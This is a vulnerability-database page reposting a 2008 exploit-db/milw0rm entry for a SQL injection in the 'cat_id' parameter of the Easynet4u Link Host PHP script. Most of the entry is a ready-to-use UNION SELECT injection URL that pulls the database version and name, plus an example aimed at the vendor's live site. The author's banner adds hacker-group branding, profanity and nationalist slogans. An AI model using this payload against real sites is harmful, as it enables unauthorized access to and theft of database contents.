Easynet4u Link Host - 'cat_id' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056901 漏洞类型
发布时间 2008-10-10 更新时间 2008-10-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/6728
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
#
# Script : Easynet4u Link Host
# Script Site: http://www.easynet4u.com/linkdem.php
# 
# SQL Injection Vuln. :
# Exploit : SITE.COM/[path]/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/*
#
# Example:
# http://www.easynet4u.com/homebusiness/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/*
#
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
#
# Bunuda yayinlamassn ebeni ...
#######################################################

# milw0rm.com [2008-10-10]